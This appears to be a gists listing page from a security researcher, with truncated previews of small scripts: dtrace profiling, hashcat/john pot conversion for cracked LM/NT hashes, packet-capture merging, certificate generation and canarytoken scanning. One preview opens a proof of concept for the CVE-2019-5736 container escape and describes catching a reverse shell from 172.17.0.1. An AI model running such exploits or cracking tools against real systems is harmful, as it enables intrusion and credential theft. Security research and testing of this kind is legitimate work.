Remember to compile with debug.
-
Trace command
sudo dtrace -c '<command>' -o out.stacks -n 'profile-997 /execname == "<command name>"/ { @[ustack(100)] = count(); }' > /dev/null -
Create Graph
| #!/bin/bash | |
| # Convert hashcat.pot to john.pot and merge them | |
| # Usage: hc-to-john.sh <hashcat pot> <john pot> | |
| # NB: Make sure the hashcat pot only contains 16 | |
| # and 32 character hashes that are LM and NT hashes | |
| tmp1=$(mktemp -t pot-port) | |
| tmp2=$(mktemp -t pot-port) | |
| hashpot=$1 | |
| LC_ALL=UTF-8 sed 's/^\([a-f0-9]\{32\}:[^:]*\)$/$NT$\1/' $hashpot | grep '^\$NT\$' > $tmp1 |
Remember to compile with debug.
Trace command
sudo dtrace -c '<command>' -o out.stacks -n 'profile-997 /execname == "<command name>"/ { @[ustack(100)] = count(); }' > /dev/null
Create Graph
| #!/bin/bash | |
| one=$1 | |
| two=$2 | |
| if [[ $one == "" || $two == "" ]]; then | |
| echo Display commands to merge two packet captures to the same time | |
| echo $0 "<cap one> <cap two> <offset>" | |
| exit 1 | |
| fi | |
| offset=$3 | |
| if [[ ! $offset > 0 ]]; then |
Remember to unzip the .docx first, or use scan.sh.
Compile the yara rule for scan.sh to work
yarac canarytoken.yar canarytoken
A Windows Arabic Code Page (CP1256) hashcat charset file. Its use is described by hashcat here. The original blog post describing it can be found at NTHashes and Encodings.
| FROM alpine:latest as builder | |
| LABEL maintainer="@singe at SensePost <research@sensepost.com>" | |
| RUN apk update && apk --no-cache add \ | |
| build-base \ | |
| && rm -rf /var/cache/apk/* | |
| WORKDIR / | |
| COPY yellow.c canary32.c canary32.h / | |
| RUN gcc -o yellow yellow.c canary32.c |
| #!/bin/bash | |
| # Simple CA cert generator & leaf cert signer | |
| # By dominic@sensepost.com | |
| # All rights reserved 2019 | |
| ca_prefix="ca" | |
| leaf_prefix="host" | |
| ca_validity="1825" #days | |
| leaf_validity="730" #days | |
| size=2048 |
| #!/bin/python3 | |
| # Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief) | |
| # Target will need a python3 interpreter | |
| # Edit IP info below, on the host run a netcat to catch the reverse shell | |
| # Run this python file in the container | |
| # Then from the host: docker exec -i <container name> /tmp/evil | |
| import os | |
| import stat | |
| host='172.17.0.1' |
| #!/bin/sh | |
| UA="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15" | |
| url="https://www.xe.com/currencyconverter/convert/" | |
| amount="$1" | |
| fromcur="$2" | |
| tocur="$3" | |
| if [ "$fromcur" == "" ]; then #Use default currencies | |
| fromcur="ZAR" | |
| tocur="GBP" | |
| fi |